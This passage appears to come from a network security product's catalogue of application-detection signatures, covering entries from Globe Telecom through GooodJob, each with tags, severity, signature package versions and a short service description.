First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Globe Telecom is a provider of telecommunications services in the Philippines. The company operates mobile, fixed line, and broadband networks in the country, providing communications services to individual customers, small and medium-sized businesses, and corporate and enterprise clients.
Back to top

Globi

About this situation: Application Globi detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Suite of tools: GlobiFlow automates your Podio Workflows. Set Automatic Triggers, Filters, and Actions. And Build Charts and Graphs of your Data. GlobiMail for Podio gets your emails into Podio automatically. PoodleSync synchronizes your Podio tasks with Toodledo.
Back to top

globo.com

About this situation: globo.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-610-5211
Last changed: sgpkg-ips-1636-5242
Description: globo.com is a Brazilian news and media portal owned by Globo Network.
Back to top

Globoforce

About this situation: Application Globoforce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Globoforce drives employee engagement, employee retention and corporate culture.
Back to top

Globus Compute

About this situation: Globus Compute usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Description: Globus is a distributed Function as a Service (FaaS) platform that enables scalable and high performance remote function execution. Globus compute platform enables to execute functions on diverse remote systems, from laptops to campus clusters, clouds, and supercomputers.
Back to top

Glogster-EDU

About this situation: Application Glogster-EDU detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Glogster is a social network that allows users to create interactive posters, or Glogs.
Back to top

Gluu

About this situation: Application Gluu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gluu - All-in-one management system online platform. Allow create, communicate and change your processes, roles and work instructions.
Back to top

GMAC

About this situation: Application GMAC detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GMAC is provider of market intelligence, research, and professional development opportunities that help schools connect with students.
Back to top

Gmail

About this situation: Gmail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1094-5242
Description: Gmail is a free email service provided by Google Inc. It offers over 1 GB free space to store emails and attachments. The service can be accessed using web browser at site mail.google.com and www.gmail.com or through POP/IMAP.
Back to top

GMX

About this situation: Application GMX detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GMX offers an interface, mail management tools and security features.
Back to top

Gmx-Mail

About this situation: GMX Mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: This service allows users to send and receive emails with a web browser. Source: Wikipedia
Back to top

Gnu-httptunnel

About this situation: Gnu httptunnel usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-767-5211
Description: Gnu httptunnel is a utility that creates a bidirectional virtual data path tunnelled in HTTP requests.
Back to top

Gnutella

About this situation: Gnutella traffic
Context: Application Context
Severity: 1
Tags: Protocols, File Sharing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1678-5242
Description: Gnutella is a large p2p network.
Back to top

Go-Reception

About this situation: Application Go-Reception detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Go Reception is a visitor management solution available for iPad and Android tablets.
Back to top

Go.com

About this situation: Go.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-623-5211
Description: An online streaming site for news,movies,shows etc.
Back to top

GoalBook

About this situation: Application GoalBook detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Goalbook's is online Toolkit of learning goals and teaching strategies, along with our best-in-class professional development, empower teachers to adapt instruction for special populations.
Back to top

GoAnywhere-MFT

About this situation: Application GoAnywhere-MFT detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoAnywhere is an enterprise secure file transfer solution that supports multiple platforms, protocols and encryption standards
Back to top

GoAssign

About this situation: Application GoAssign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoAssign - online scheduling software.
Back to top

GoBig-Inc.

About this situation: Application GoBig-Inc. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoBig is a Guest WiFi marketing lead generation device for restaurants and retailers. GoBig includes WiFi device, email marketing, mobile text marketing, integrated social media and other online marketing tools.
Back to top

GoCardless

About this situation: Application GoCardless detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoCardless is a service that allows to set up interbank transfers for customers.
Back to top

GoCodes-Asset-Management

About this situation: Application GoCodes-Asset-Management detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoCodes Asset Management Solutions is a scanable QR code asset and inventory tagging. Our patented software allows you to securely tag your physical assets and manage them using our powerful and easy-to-use web-based management software.
Back to top

GoCodes-Fixed-Asset-Management-and-Inventory-Tracking

About this situation: Application GoCodes-Fixed-Asset-Management-and-Inventory-Tracking detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Asset Management Inventory Tracking software: GoCodes - designed to work on all smartphones, tablets and computers, GoCodes is simple to set up and requires no IT expertise - which means anyone can use it. GoCodes provides a complete single-vendor solution including tags and software that leverages the devices and software you already have, so there's no hardware or software to install and configure.
Back to top

GoComics

About this situation: GoComics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Games, Application Routing
First detected in: sgpkg-ips-599-5211
Last changed: sgpkg-ips-629-5211
Description: GoComics is a hosting service for various comics.
Back to top

Godaddy-CRL

About this situation: Godaddy Certificate revocation list service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-1189-5242
Last changed: sgpkg-ips-1189-5242
Description: Certificate revocation lists are used for verifying if a certificate has been revoked by the issuing certificate authority (CA).
Back to top

Godaddy-OCSP

About this situation: Godaddy Online Certificate Status service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-1769-5242
Description: Online Certitificate Status Protocol (OCSP) is used to validate status of Extended Validation Certificates (EV certificates) used with HTTPS.
Back to top

goEmerchant

About this situation: Application goEmerchant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Merchant Account provider of affordable merchant solutions for small businesses. Including internet merchant account, online shopping cart software, Point of Sale software, payment gateway, SSL, web hosting, marketing tools, and domain name registration.
Back to top

GoFileRoom

About this situation: Application GoFileRoom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Thomson Reuters GoFileRoom is an accounting document management service accessible from any web browser. From your program account, you can store, manage, and scan your documents remotely. Additionally, you can setup workflows to route your files to the appropriate parties. Lastly, Thomson Reuters GoFileRoom helps you enforce accounting document management requirements by automatically marking files for archiving or destruction when appropriate.
Back to top

GoFundMe

About this situation: Application GoFundMe detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoFundMe is crowdfunding site for personal causes and life events.
Back to top

Gog

About this situation: Application Gog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gog made to download the best classic and new games on Windows, Mac and Linux.
Back to top

Goget

About this situation: Application Goget detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Travel and Expense, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoGet CarShare is a car sharing service operating in Sydney, Melbourne, Brisbane and Adelaide, and the first such program in Australia.
Back to top

Gogiro

About this situation: Application Gogiro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Managed online services to help small business get new customers and stay organized. Gogiro manages your business presence online on a pay-as-you-go basis, keeping things simple and affordable.
Back to top

Gogo-Inflight-Internet

About this situation: Application Gogo-Inflight-Internet detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Gogo Inflight Internet empower passengers who travel with their Wi-Fi enabled devices, such as laptops and handhelds, and allow them to surf the Web, check e-mail, Instant Message, access corporate VPNs, and basically stay connected to life.
Back to top

Gogobox

About this situation: Gogobox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: A Japanese website.
Back to top

GoingUp!

About this situation: Application GoingUp! detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoingUp
Back to top

Golden-Frog

About this situation: Application Golden-Frog detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Golden Frog develops software and online services focused on privacy and security.
Back to top

GoldenCAN---Merchant

About this situation: Application GoldenCAN---Merchant detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoldenCAN Affiliate Data Feed Integration enables affiliates to add millions of products, coupons, recent price drop products on their websites with only one line of HTML code.
Back to top

GoldenLine

About this situation: Application GoldenLine detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoldenLine is social networking site aimed at finding work for users and help recruiters to select the best candidates.
Back to top

Gomeetnow

About this situation: GoMeetNow usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: GoMeetNow is a web-based conferencing solution, which allows you to schedule and conduct meetings, and collaborate on projects.
Back to top

Gonitro

About this situation: GoNitro usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description: Nitro software (GoNitro) offers a PDF editor, PDF productivity tools as well as an application for electronic signatures.
Back to top

Gonitro File Download

About this situation: Gonitro file download detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1861-5242
Description: Gonitro file download detected. Requires decryption to work.
Back to top

Gonitro File Upload

About this situation: Gonitro file upload detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-1859-5242
Last changed: sgpkg-ips-1859-5242
Description: Gonitro file upload detected. Requires decryption to work.
Back to top

Goo-Blog

About this situation: goo blog usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This site is a Japanese blogging service that allows users to write and read content.
Back to top

Goo-Webmail

About this situation: Goo WebMail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Web Mail, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A Japanese Web based mail service.
Back to top

GoodBye-Chain-Group

About this situation: Application GoodBye-Chain-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoodBye Chain Group offers software products and consulting services specializes in solving of organizational and technical challenge in electronics industry .
Back to top

GoodData

About this situation: Application GoodData detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GoodData is software company offers cloud-based business intelligence (BI) and big data analytics platform.
Back to top

Goodreads

About this situation: Goodreads usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based social networking service which allows users to connect and share information with each other online.
Back to top

Goodsie

About this situation: Application Goodsie detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Goodsie provides modern e-commerce software for small and medium size retailers. Our unique design system gives sellers a completely new way to create a custom e-commerce presence
Back to top

GoodSync

About this situation: GoodSync usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Description: GoodSync is a synchronization and files back up software. GoodSync supports a wide range of file storage media (local and networked).
Back to top

Google

About this situation: Google usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Basic Internet Services, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1693-5242
Description: Google provides several internet-related services such as a search engine, cloud computing, and webmail.
Back to top

Google Chrome

About this situation: Endpoint Context Agent based Google Chrome
Context: EI Correlation
Severity: 1
Tags: Web Browsers, Endpoint
First detected in: sgpkg-ips-703-5211
Last changed: sgpkg-ips-1531-5242
Description: Google Chrome endpoint application has been detected.
Back to top

Google Drive

About this situation: Endpoint Context Agent based Google Drive detection
Context: EI Correlation
Severity: 1
Tags: Business Apps, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1531-5242
Description: Google Drive endpoint application has been detected. Google Drive is a file hosting service operated by Google Inc.
Back to top

Google SafeSearch Resolve

About this situation: This defines a resolution rule used when Google SafeSearch is enforced.
Context: DNS Host Resolution
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a resolution rule used when Google SafeSearch is enforced.
Back to top

Google SafeSearch Rewrite

About this situation: This defines a rewrite rule used when Google SafeSearch is enforced.
Context: DNS Host Rewriting
Severity: 1
Tags: Content Identification
First detected in: sgpkg-ips-1210-5242
Last changed: sgpkg-ips-1210-5242
Description: This defines a rewrite rule used when Google SafeSearch is enforced.
Back to top

Google Update

About this situation: Endpoint Context Agent based Google Update detection
Context: EI Correlation
Severity: 1
Tags: Software / System Updates, Endpoint
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1686-5242
Description: Google Update endpoint application has been detected. Google Update is used for updating Google client services.
Back to top

Google-Accounts

About this situation: Google Accounts usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-765-5211
Last changed: sgpkg-ips-1094-5242
Description: Google Accounts is a service by Google for centralized authentication. It is used by all of Google's applications such as Gmail, YouTube and Google Drive.
Back to top

Google-Ad-Services

About this situation: Google Ad Services usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Google Ad Services usage has been detected.
Back to top

Google-Admeld

About this situation: Google Admeld usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-628-5211
Description: Admeld is an on-line advertising service.
Back to top

Google-Adsense

About this situation: Application Google-Adsense detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Adsense - program run by Google that allows publishers in the Google Network of content sites to serve automatic text, image, video, or interactive media advertisements that are targeted to site content and audience.
Back to top

Google-Adwords

About this situation: Application Google-Adwords detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google AdWords is an online advertising service that places advertising copy at the top or bottom of, or beside, the list of results Google displays for a particular search query. The choice and placement of the ads is based in part on a proprietary determination of the relevance of the search query to the advertising copy.
Back to top

Google-Analytics

About this situation: Google Analytics usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1676-5242
Description: Google Analytics is a service offered by Google that generates detailed statistics about a website's traffic and traffic sources and measures conversions and sales.
Back to top

Google-Android-Dalvik

About this situation: Dalvik on Google Android usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-534-5211
Last changed: sgpkg-ips-1638-5242
Description: Dalvik is a core part of Android mobile operating system.
Back to top

Google-Answers

About this situation: Application Google-Answers detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Answers is a service for collective answers to questions.
Back to top

Google-App-Engine

About this situation: Google App Engine usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-630-5211
Description: Google App Engine usage has been detected.
Back to top

Google-Books

About this situation: Google Books usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-595-5211
Description: Google Books was formerly known as Google Print when it was introduced at the Frankfurt Book Fair in October 2004. Source: Wikipedia
Back to top

Google-Cache

About this situation: Google Cache usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-408-4219
Last changed: sgpkg-ips-595-5211
Description: Google Cache usage has been detected.
Back to top

Google-Calendar

About this situation: Google Calendar usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Google Calendar is a free calendar web application offered by Google.
Back to top

Google-Chrome-Update

About this situation: Google Chrome Update usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Updates, Application Routing
First detected in: sgpkg-ips-680-5211
Last changed: sgpkg-ips-1223-5242
Description: Google Chrome update service usage has been detected.
Back to top

Google-Cloud

About this situation: Application Google-Cloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Hosting, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Cloud Platform lets you build and host applications and websites, store data, and analyze data on Googles scalable infrastructure.
Back to top

Google-Code

About this situation: Google Code usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-437-4219
Last changed: sgpkg-ips-1258-5242
Description: Google Code usage has been detected.
Back to top

Google-Desktop

About this situation: Google Desktop usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Google Desktop allows text searches of a user's emails, computer files, music, photos, chats, web pages viewed, and other "Google Gadgets". Source: Wikipedia
Back to top

Google-Docs

About this situation: Google Docs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1690-5242
Description: Google Docs is a free web-based office suite.
Back to top

Google-DoubleClick

About this situation: Google DoubleClick usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Statistics, Application Routing
First detected in: sgpkg-ips-488-5211
Last changed: sgpkg-ips-767-5211
Description: DoubleClick is an on-line advertising service.
Back to top

Google-Drive

About this situation: Google Drive usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1693-5242
Description: This service allows the user to utilize cloud-storage and install a client on their device to synchronize a variety of file types. Source: Wikipedia
Back to top

Google-Earth

About this situation: Google Earth usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-514-5211
Last changed: sgpkg-ips-1283-5242
Description: Google Earth is a virtual globe, map and geographical information program.
Back to top

Google-Feedburner

About this situation: Google Feedburner usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-632-5211
Last changed: sgpkg-ips-1094-5242
Description: Google Feedburner is a web feed management service.
Back to top

Google-Finance

About this situation: Google Finance usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Finance, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-641-5211
Description: A Google service that features business and enterprise headlines for many corporations including financial decisions, news events, and stock information; Source Wikipedia
Back to top

Google-Groups

About this situation: Google Groups usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Discussion Forum, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Google Groups is a web-based discussion group service.
Back to top

Google-Hangouts

About this situation: Application Google-Hangouts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Hangouts is a communication platform, which includes instant messaging, video chat, SMS and VOIP features.
Back to top

Google-Hosted-Libraries

About this situation: Google Hosted Libraries usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Infrastructure Services, Application Routing
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1179-5242
Description: Google Hosted Libraries usage detected. Google maintains a high-speed content delivery network for most common used web-libraries.
Back to top

Google-Images

About this situation: Google Images usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-636-5211
Description: Google Images uses keywords for the image search based on the file name of the image, the link text pointing to the image, and text adjacent to the image. When searching for an image, a thumbnail of each matching image is displayed. Then when clicking on a thumbnail, the image is displayed in a frame at the top of the page and the website on which that image was found is displayed in a frame below it, making it easier to see from where the image is coming. Source: Wikipedia
Back to top

Google-Keep

About this situation: Application Google-Keep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Keep is a note taking service. Google Keep is available as a mobile app for the Android and iOS mobile operating systems and as a web application.
Back to top

Google-Maps

About this situation: Google Maps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Orienteering, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1805-5242
Description: Google Maps usage has been detected. Google Maps is a web mapping service provided by Google.
Back to top

Google-Merchant-Center

About this situation: Application Google-Merchant-Center detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Merchant Center is the place to upload your product data to Google and make it available to Google Shopping or other Google services.
Back to top

Google-Music-(music-Beta)

About this situation: Google Music (Music Beta) usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-559-5211
Description: This service allows streaming music to desktop browsers and Android phones and tablets, or any other device that can use the Adobe Flash. Source: Wikipedia
Back to top

Google-News

About this situation: Google News usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Google News provides searching, and the choice of sorting the results by date and time of publishing (not to be confused with date and time of the news happening) or grouping them (and also grouping without searching). In the English versions, there are options to tailor the grouping to a selected national audience. Source: Wikipedia
Back to top

Google-Orkut

About this situation: Google Orkut usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1693-5242
Description: Orkut is a social networking website that is owned and operated by Google Inc. The service is designed to helpusers meet new and old friends and maintain existing relationships. The service can be accessed using a web browser at the site: www.orkut.com.
Back to top

Google-Photos

About this situation: Application Google-Photos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Photos is an online photo storage. All your photos are backed up safely, organized and labeled automatically, so you can find them fast, and share them how you like.
Back to top

Google-Picasa

About this situation: Google Picasa usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1678-5242
Description: Picasa Web Albums is the web-based version of the Picasa client software by Google. The web service can be accessed using a web browser at the site: picasaweb.google.com.
Back to top

Google-Play

About this situation: Google Play usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-577-5211
Last changed: sgpkg-ips-1652-5242
Description: Google Play is a digital distribution platform for apps on Android and an online electronics and digital media store developed and maintained by Google. Source: Wikipedia
Back to top

Google-Plus

About this situation: Google+ usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1258-5242
Description: Google Plus is a social networking web site run by Google Inc.
Back to top

Google-Safebrowsing

About this situation: Google Safebrowsing service usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-768-5211
Description: Google Safebrowsing usage has been detected.
Back to top

Google-Sites

About this situation: Google Sites usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-666-5211
Description: Google Sites offers a website creation package that allows people to build quick Sites for collaboration and team work. The product was formerly provided by JotSpot and was acquired by Google in 2006. The service can be access at https://sites.google.com/.
Back to top

Google-Talk

About this situation: Google Talk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Chat, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-1638-5242
Description: Google Talk is an instant messaging and VoIP service provided by Google Inc. The standalone client-side application is only available on Windows platform.
Back to top

Google-Translate

About this situation: Google Translate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-1258-5242
Description: Google Translate is a web based language text translation service run by Google Inc.
Back to top

Google-Trends

About this situation: Google Trends usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-629-5211
Description: Google Trends allows the user to compare the volume of searches between two or more terms. An additional feature is in its ability to show news related to the search-term overlaid on the chart, showing how new events affect search popularity. Source: Wikipedia
Back to top

Google-Url-Shortener

About this situation: Google Url Shortener usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Tunneling, Application Routing
First detected in: sgpkg-ips-774-5211
Last changed: sgpkg-ips-1706-5242
Description: Google Url Shortener is a service that allows shorten long and complex URL links to shorter links. While adding convience when sharing links the service will mask the true destination of the given link.
Back to top

Google-Wave

About this situation: Application Google-Wave detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Google Wave is a web-based computing platform and communications protocol designed to merge key features of communications media such as email, instant messaging, wikis, and social networking.
Back to top

Google-Workspace

About this situation: Google Workspace usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-1374-5242
Last changed: sgpkg-ips-1374-5242
Description: Google Workspace (formerly G Suite) is a collection office apps.
Back to top

Goomzee-Commerce

About this situation: Application Goomzee-Commerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: GooIt is a complete, hosted online store website with shopping cart.
Back to top

GooodJob

About this situation: Application GooodJob detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
